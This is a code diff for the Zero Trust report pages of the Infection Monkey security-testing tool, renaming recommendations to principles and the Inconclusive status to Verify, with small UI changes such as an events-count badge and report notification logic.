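    'data': {'proxy': 'http://10.2.2.2:5000'}  # a non-None proxy means the monkey tunneled traffic
}
# test_tunneling_violation(sample_tunnel_telemetry) would record a failed TEST_TUNNELING finding.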
@@ -104,6 +104,7 @@
    "react-tooltip-lite": "^1.9.1",
    "redux": "^4.0.0",
    "sass-loader": "^7.1.0",
    "sha3": "^2.0.0"
    "sha3": "^2.0.0",
    "pluralize": "^7.0.0"
  }
}
@@ -29,6 +29,8 @@ let infectionMonkeyImage = require('../images/infection-monkey.svg');
let guardicoreLogoImage = require('../images/guardicore-logo.png');
let notificationIcon = require('../images/notification-logo-512x512.png');

const reportZeroTrustRoute = '/report/zero_trust';

class AppComponent extends AuthComponent {
  updateStatus = () => {
    this.auth.loggedIn()

@@ -200,7 +202,7 @@ class AppComponent extends AuthComponent {
            {this.renderRoute('/infection/telemetry', <TelemetryPage onStatusChange={this.updateStatus}/>)}
            {this.renderRoute('/start-over', <StartOverPage onStatusChange={this.updateStatus}/>)}
            {this.renderRoute('/report/security', <ReportPage onStatusChange={this.updateStatus}/>)}
            {this.renderRoute('/report/zero_trust', <ZeroTrustReportPage onStatusChange={this.updateStatus}/>)}
            {this.renderRoute(reportZeroTrustRoute, <ZeroTrustReportPage onStatusChange={this.updateStatus}/>)}
            {this.renderRoute('/license', <LicensePage onStatusChange={this.updateStatus}/>)}
          </Col>
        </Row>

@@ -210,10 +212,11 @@ class AppComponent extends AuthComponent {
  }

  showInfectionDoneNotification() {
    if (this.state.completedSteps.infection_done) {
      let hostname = window.location.hostname;
      let url = `https://${hostname}:5000/report`;
      console.log("Trying to show notification. URL: " + url + " | icon: " + notificationIcon);
    if (this.shouldShowNotification()) {
      const hostname = window.location.hostname;
      const port = window.location.port;
      const protocol = window.location.protocol;
      const url = `${protocol}//${hostname}:${port}${reportZeroTrustRoute}`;

      Notifier.start(
        "Monkey Island",

@@ -222,6 +225,11 @@ class AppComponent extends AuthComponent {
        notificationIcon);
    }
  }

  shouldShowNotification() {
    // No need to show the notification to redirect to the report if we're already in the report page
    return (this.state.completedSteps.infection_done && !window.location.pathname.startsWith("/report"));
  }
}

AppComponent.defaultProps = {};
@@ -8,7 +8,7 @@ import PrintReportButton from "../report-components/common/PrintReportButton";
import {extractExecutionStatusFromServerResponse} from "../report-components/common/ExecutionStatus";
import SummarySection from "../report-components/zerotrust/SummarySection";
import FindingsSection from "../report-components/zerotrust/FindingsSection";
import RecommendationsSection from "../report-components/zerotrust/RecommendationsSection";
import PrinciplesSection from "../report-components/zerotrust/PrinciplesSection";

class ZeroTrustReportPageComponent extends AuthComponent {

@@ -72,8 +72,8 @@ class ZeroTrustReportPageComponent extends AuthComponent {
    } else {
      content = <div id="MainContentSection">
        <SummarySection allMonkeysAreDead={this.state.allMonkeysAreDead} pillars={this.state.pillars}/>
        <RecommendationsSection recommendations={this.state.recommendations}
                                pillarsToStatuses={this.state.pillars.pillarsToStatuses}/>
        <PrinciplesSection principles={this.state.principles}
                           pillarsToStatuses={this.state.pillars.pillarsToStatuses}/>
        <FindingsSection pillarsToStatuses={this.state.pillars.pillarsToStatuses} findings={this.state.findings}/>
      </div>;
    }

@@ -102,7 +102,7 @@ class ZeroTrustReportPageComponent extends AuthComponent {
  stillLoadingDataFromServer() {
    return typeof this.state.findings === "undefined"
      || typeof this.state.pillars === "undefined"
      || typeof this.state.recommendations === "undefined";
      || typeof this.state.principles === "undefined";
  }

  getZeroTrustReportFromServer() {

@@ -114,11 +114,11 @@ class ZeroTrustReportPageComponent extends AuthComponent {
          findings: res
        });
      });
    this.authFetch('/api/report/zero_trust/recommendations')
    this.authFetch('/api/report/zero_trust/principles')
      .then(res => res.json())
      .then(res => {
        this.setState({
          recommendations: res
          principles: res
        });
      });
    this.authFetch('/api/report/zero_trust/pillars')
@@ -24,7 +24,7 @@ let renderPbaResults = function (results) {
};

const subColumns = [
  {id: 'pba_name', Header: "Name", accessor: x => x.name, style: { 'whiteSpace': 'unset' }},
  {id: 'pba_name', Header: "Name", accessor: x => x.name, style: { 'whiteSpace': 'unset' }, width: 160},
  {id: 'pba_output', Header: "Output", accessor: x => renderPbaResults(x.result), style: { 'whiteSpace': 'unset' }}
];
@@ -1,9 +1,7 @@
import React, {Component} from "react";
import React, {Component, Fragment} from "react";
import EventsModal from "./EventsModal";
import {Button} from "react-bootstrap";
import FileSaver from "file-saver";
import {Badge, Button} from "react-bootstrap";
import * as PropTypes from "prop-types";
import ExportEventsButton from "./ExportEventsButton";

export default class EventsButton extends Component {
  constructor(props) {

@@ -22,18 +20,21 @@ export default class EventsButton extends Component {
  };

  render() {
    return (
      <div>
        <EventsModal events={this.props.events} showEvents={this.state.isShow} hideCallback={this.hide} exportFilename={this.props.exportFilename} />
    return <Fragment>
      <EventsModal events={this.props.events} showEvents={this.state.isShow} hideCallback={this.hide}
                   exportFilename={this.props.exportFilename}/>
      <div className="text-center" style={{"display": "grid"}}>
        <Button className="btn btn-primary btn-lg" onClick={this.show}>
          <i className="fa fa-list"/> Events
          <i className="fa fa-list"/> Events {this.createEventsAmountBadge()}
        </Button>
      </div>
      </div>
    );
    </Fragment>;
  }

  createEventsAmountBadge() {
    const eventsAmountBadgeContent = this.props.events.length > 9 ? "9+" : this.props.events.length;
    return <Badge>{eventsAmountBadgeContent}</Badge>;
  }
}

EventsButton.propTypes = {
@@ -1,9 +1,11 @@
import React, {Component} from "react";
import {Modal} from "react-bootstrap";
import {Badge, Modal} from "react-bootstrap";
import EventsTimeline from "./EventsTimeline";
import * as PropTypes from "prop-types";
import ExportEventsButton from "./ExportEventsButton";
import saveJsonToFile from "../../utils/SaveJsonToFile";
import EventsModalButtons from "./EventsModalButtons";
import Pluralize from 'pluralize'
import {statusToLabelType} from "./StatusLabel";

export default class EventsModal extends Component {
  constructor(props) {

@@ -15,28 +17,31 @@ export default class EventsModal extends Component {
      <div>
        <Modal show={this.props.showEvents} onHide={() => this.props.hideCallback()}>
          <Modal.Body>
            <h2>
            <h3>
              <div className="text-center">Events</div>
            </h2>
            </h3>
            <hr />
            <p>
              There {Pluralize('is', this.props.events.length)} {<div className={"label label-primary"}>{this.props.events.length}</div>} {Pluralize('event', this.props.events.length)} associated with this finding.
            </p>
            {this.props.events.length > 5 ? this.renderButtons() : null}
            <EventsTimeline events={this.props.events}/>

            <div className="text-center">
              <button type="button" className="btn btn-success btn-lg" style={{margin: '5px'}}
                      onClick={() => this.props.hideCallback()}>
                Close
              </button>
              <ExportEventsButton onClick={() => {
                const dataToSave = this.props.events;
                const filename = this.props.exportFilename;
                saveJsonToFile(dataToSave, filename);
              }}/>
            </div>
            {this.renderButtons()}
          </Modal.Body>
        </Modal>
      </div>
    );
  }

  renderButtons() {
    return <EventsModalButtons
      onClickClose={() => this.props.hideCallback()}
      onClickExport={() => {
        const dataToSave = this.props.events;
        const filename = this.props.exportFilename;
        saveJsonToFile(dataToSave, filename);
      }}/>;
  }
}

EventsModal.propTypes = {
@@ -0,0 +1,20 @@
import React, {Component} from "react";
import ExportEventsButton from "./ExportEventsButton";
import * as PropTypes from "prop-types";

export default class EventsModalButtons extends Component {
  render() {
    return <div className="text-center">
      <button type="button" className="btn btn-success btn-lg" style={{margin: '5px'}}
              onClick={this.props.onClickClose}>
        Close
      </button>
      <ExportEventsButton onClick={this.props.onClickExport}/>
    </div>
  }
}

EventsModalButtons.propTypes = {
  onClickClose: PropTypes.func,
  onClickExport: PropTypes.func
};
@@ -14,7 +14,7 @@ export default class EventsTimeline extends Component {
  render() {
    return (
      <div>
        <Timeline>
        <Timeline style={{fontSize: '100%'}}>
          {
            this.props.events.map((event, index) => {
              const event_time = new Date(event.timestamp['$date']).toString();

@@ -22,7 +22,6 @@ export default class EventsTimeline extends Component {
                key={index}
                createdAt={event_time}
                title={event.title}

                icon={<img src={eventTypeToIcon[event.event_type]} alt="icon" style={{width: '24px'}} />}>
                {event.message}
              </TimelineEvent>)
@@ -35,7 +35,7 @@ class FindingsSection extends Component {
        </p>

        <FindingsTable data={findingsByStatus[ZeroTrustStatuses.failed]} status={ZeroTrustStatuses.failed}/>
        <FindingsTable data={findingsByStatus[ZeroTrustStatuses.inconclusive]} status={ZeroTrustStatuses.inconclusive}/>
        <FindingsTable data={findingsByStatus[ZeroTrustStatuses.verify]} status={ZeroTrustStatuses.verify}/>
        <FindingsTable data={findingsByStatus[ZeroTrustStatuses.passed]} status={ZeroTrustStatuses.passed}/>
      </div>
    );
@@ -0,0 +1,31 @@
import React, {Component} from "react";
import SinglePillarPrinciplesStatus from "./SinglePillarPrinciplesStatus";
import * as PropTypes from "prop-types";

export default class PrinciplesSection extends Component {
  render() {
    return <div id="principles-section">
      <h2>Test Results</h2>
      <p>
        The <a href="https://www.forrester.com/report/The+Zero+Trust+eXtended+ZTX+Ecosystem/-/E-RES137210">
          Zero Trust eXtended (ZTX) framework
        </a> is composed of 7 pillars. Each pillar is built of
        several guiding principles tested by the Infection Monkey.
      </p>
      {
        Object.keys(this.props.principles).map((pillar) =>
          <SinglePillarPrinciplesStatus
            key={pillar}
            pillar={pillar}
            principlesStatus={this.props.principles[pillar]}
            pillarsToStatuses={this.props.pillarsToStatuses}/>
        )
      }
    </div>
  }
}

PrinciplesSection.propTypes = {
  principles: PropTypes.object,
  pillarsToStatuses: PropTypes.object
};
@@ -16,7 +16,7 @@ const columns = [
    },
    maxWidth: MAX_WIDTH_STATUS_COLUMN
  },
  { Header: 'ZT Recommendation', accessor: 'recommendation',
  { Header: 'Zero Trust Principle', accessor: 'principle',
    style: {'whiteSpace': 'unset'} // This enables word wrap
  },
  { Header: 'Monkey Tests', id: 'tests',

@@ -34,7 +34,7 @@ class TestsStatus extends AuthComponent {
    return (
      <Fragment>
        {this.getFilteredTestsByStatusIfAny(ZeroTrustStatuses.failed)}
        {this.getFilteredTestsByStatusIfAny(ZeroTrustStatuses.inconclusive)}
        {this.getFilteredTestsByStatusIfAny(ZeroTrustStatuses.verify)}
        {this.getFilteredTestsByStatusIfAny(ZeroTrustStatuses.passed)}
        {this.getFilteredTestsByStatusIfAny(ZeroTrustStatuses.unexecuted)}
      </Fragment>

@@ -60,12 +60,12 @@ class TestsStatus extends AuthComponent {
  }
}

export class RecommendationsStatusTable extends AuthComponent {
export class PrinciplesStatusTable extends AuthComponent {
  render() {
    return <PaginatedTable data={this.props.recommendationsStatus} columns={columns} pageSize={5}/>;
    return <PaginatedTable data={this.props.principlesStatus} columns={columns} pageSize={5}/>;
  }
}

export default RecommendationsStatusTable;
export default PrinciplesStatusTable;

RecommendationsStatusTable.propTypes = {recommendationsStatus: PropTypes.array};
PrinciplesStatusTable.propTypes = {principlesStatus: PropTypes.array};
@@ -1,29 +0,0 @@
import React, {Component} from "react";
import SinglePillarRecommendationsStatus from "./SinglePillarRecommendationsStatus";
import * as PropTypes from "prop-types";

export default class RecommendationsSection extends Component {
  render() {
    return <div id="recommendations-section">
      <h2>Recommendations</h2>
      <p>
        Analyze each zero trust recommendation by pillar, and see if you've followed through with it. See test results
        to understand how the monkey tested your adherence to that recommendation.
      </p>
      {
        Object.keys(this.props.recommendations).map((pillar) =>
          <SinglePillarRecommendationsStatus
            key={pillar}
            pillar={pillar}
            recommendationsStatus={this.props.recommendations[pillar]}
            pillarsToStatuses={this.props.pillarsToStatuses}/>
        )
      }
    </div>
  }
}

RecommendationsSection.propTypes = {
  recommendations: PropTypes.object,
  pillarsToStatuses: PropTypes.object
};
@@ -27,35 +27,32 @@ class ZeroTrustReportLegend extends Component {

  getLegendContent() {
    return <div id={this.constructor.name}>
      <h4>Statuses</h4>
      <ul style={{listStyle: "none"}}>
        <li>
          <div style={{display: "inline-block"}}>
            <StatusLabel showText={true} status={ZeroTrustStatuses.failed}/>
          </div>
          {"\t"}Some tests failed; the monkeys found something wrong.
          {"\t"}At least one of the tests related to this component failed. This means that the Infection Monkey detected an unmet Zero Trust requirement.
        </li>
        <li>
          <div style={{display: "inline-block"}}>
            <StatusLabel showText={true} status={ZeroTrustStatuses.inconclusive}/>
            <StatusLabel showText={true} status={ZeroTrustStatuses.verify}/>
          </div>
          {"\t"}The test ran; manual verification is required to determine the results.
          {"\t"}At least one of the tests’ results related to this component requires further manual verification.
        </li>
        <li>
          <div style={{display: "inline-block"}}>
            <StatusLabel showText={true} status={ZeroTrustStatuses.passed}/>
          </div>
          {"\t"}The test passed, so this is OK 🙂
          {"\t"}All Tests related to this pillar passed. No violation of a Zero Trust guiding principle was detected.
        </li>
        <li>
          <div style={{display: "inline-block"}}>
            <StatusLabel showText={true} status={ZeroTrustStatuses.unexecuted}/>
          </div>
          {"\t"}This status means the test wasn't executed.
          {"\t"}This status means the test wasn't executed.To activate more tests, refer to the Monkey <NavLink to="/configuration"><u>configuration</u></NavLink> page.
        </li>
      </ul>
      <hr />
      Some of the tests can be activated using the <NavLink to="/configuration"><u>configuration</u></NavLink>.
    </div>;
  }
}
@@ -1,13 +1,13 @@
import AuthComponent from "../../AuthComponent";
import PillarLabel from "./PillarLabel";
import RecommendationsStatusTable from "./RecommendationsStatusTable";
import PrinciplesStatusTable from "./PrinciplesStatusTable";
import React from "react";
import * as PropTypes from "prop-types";
import {Panel} from "react-bootstrap";

export default class SinglePillarRecommendationsStatus extends AuthComponent {
export default class SinglePillarPrinciplesStatus extends AuthComponent {
  render() {
    if (this.props.recommendationsStatus.length === 0) {
    if (this.props.principlesStatus.length === 0) {
      return null;
    }
    else {

@@ -22,7 +22,7 @@ export default class SinglePillarRecommendationsStatus extends AuthComponent {
          </Panel.Heading>
          <Panel.Collapse>
            <Panel.Body>
              <RecommendationsStatusTable recommendationsStatus={this.props.recommendationsStatus}/>
              <PrinciplesStatusTable principlesStatus={this.props.principlesStatus}/>
            </Panel.Body>
          </Panel.Collapse>
        </Panel>

@@ -31,7 +31,7 @@ export default class SinglePillarRecommendationsStatus extends AuthComponent {
  }
}

SinglePillarRecommendationsStatus.propTypes = {
  recommendationsStatus: PropTypes.array,
SinglePillarPrinciplesStatus.propTypes = {
  principlesStatus: PropTypes.array,
  pillar: PropTypes.string,
};
@@ -3,14 +3,14 @@ import * as PropTypes from "prop-types";

const statusToIcon = {
  "Passed": "fa-check",
  "Inconclusive": "fa-exclamation-triangle",
  "Verify": "fa-exclamation-triangle",
  "Failed": "fa-bomb",
  "Unexecuted": "fa-question",
};

export const statusToLabelType = {
  "Passed": "label-success",
  "Inconclusive": "label-warning",
  "Verify": "label-warning",
  "Failed": "label-danger",
  "Unexecuted": "label-default",
};
@@ -8,7 +8,7 @@ export default class StatusesToPillarsSummary extends Component {
  render() {
    return (<div id="piilar-summary">
      {this.getStatusSummary(ZeroTrustStatuses.failed)}
      {this.getStatusSummary(ZeroTrustStatuses.inconclusive)}
      {this.getStatusSummary(ZeroTrustStatuses.verify)}
      {this.getStatusSummary(ZeroTrustStatuses.passed)}
      {this.getStatusSummary(ZeroTrustStatuses.unexecuted)}
    </div>);
@@ -14,7 +14,9 @@ export default class SummarySection extends Component {
          <Col xs={12} sm={12} md={12} lg={12}>
            <MonkeysStillAliveWarning allMonkeysAreDead={this.props.allMonkeysAreDead}/>
            <p>
              Get a quick glance of the status for each of Zero Trust's seven pillars.
              Get a quick glance at how your network aligns with the <a href="https://www.forrester.com/report/The+Zero+Trust+eXtended+ZTX+Ecosystem/-/E-RES137210">
                Zero Trust eXtended (ZTX) framework
              </a>.
            </p>
          </Col>
        </Row>

@@ -27,20 +29,6 @@ export default class SummarySection extends Component {
            <ZeroTrustReportLegend/>
          </Col>
        </Row>
        <Row>
          <Col xs={12} sm={12} md={12} lg={12}>
            <h4>What am I seeing?</h4>
            <p>
              The <a href="https://www.forrester.com/report/The+Zero+Trust+eXtended+ZTX+Ecosystem/-/E-RES137210">Zero
              Trust eXtended framework</a> categorizes its <b>recommendations</b> into 7 <b>pillars</b>. Infection
              Monkey
              Zero Trust edition tests some of those recommendations. The <b>tests</b> that the monkey executes
              produce <b>findings</b>. The tests, recommendations and pillars are then granted a <b>status</b> in
              accordance
              with the tests results.
            </p>
          </Col>
        </Row>
      </Grid>
    </div>
  }
@@ -10,7 +10,7 @@ export const ZeroTrustPillars = {

export const ZeroTrustStatuses = {
  failed: "Failed",
  inconclusive: "Inconclusive",
  verify: "Verify",
  passed: "Passed",
  unexecuted: "Unexecuted"
};
@@ -78,23 +78,22 @@ class VennDiagram extends React.Component {
    RULE #1: All scores have to be equal 0, except Unexecuted [U] which could be also a negative integer
             sum(C, I, P) has to be <=0

    RULE #2: Conclusive [C] has to be > 0,
    RULE #2: Failed [C] has to be > 0,
             sum(C) > 0

    RULE #3: Inconclusive [I] has to be > 0 while Conclusive has to be 0,
    RULE #3: Verify [I] has to be > 0 while Failed has to be 0,
             sum(C, I) > 0 and C * I = 0, while C has to be 0

    RULE #4: By process of elimination, passed.
             if the P is bigger by 2 then negative U, first conditional
             would be true.

    */

    this.rules = [

      {
        id: 'Rule #1', status: ZeroTrustStatuses.unexecuted, hex: '#777777', f: function (d_) {
          return d_[ZeroTrustStatuses.failed] + d_[ZeroTrustStatuses.inconclusive] + d_[ZeroTrustStatuses.passed] === 0;
          return d_[ZeroTrustStatuses.failed] + d_[ZeroTrustStatuses.verify] + d_[ZeroTrustStatuses.passed] === 0;
        }
      },
      {

@@ -103,8 +102,8 @@ class VennDiagram extends React.Component {
        }
      },
      {
        id: 'Rule #3', status: 'Inconclusive', hex: '#F0AD4E', f: function (d_) {
          return d_[ZeroTrustStatuses.failed] === 0 && d_[ZeroTrustStatuses.inconclusive] > 0;
        id: 'Rule #3', status: ZeroTrustStatuses.verify, hex: '#F0AD4E', f: function (d_) {
          return d_[ZeroTrustStatuses.failed] === 0 && d_[ZeroTrustStatuses.verify] > 0;
        }
      },
      {
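As a plain-language check of the rule ordering documented in the comment above, the same decision logic can be sketched outside the component (this Python sketch is for illustration only and is not part of the commit):

# Illustration only: how the four VennDiagram rules resolve a pillar's display status.
def resolve_pillar_status(failed, verify, passed, unexecuted):
    if failed + verify + passed == 0:  # Rule #1
        return "Unexecuted"
    if failed > 0:                     # Rule #2
        return "Failed"
    if verify > 0:                     # Rule #3 (failed is known to be 0 here)
        return "Verify"
    return "Passed"                    # Rule #4, by elimination

# e.g. resolve_pillar_status(failed=0, verify=2, passed=3, unexecuted=1) == "Verify"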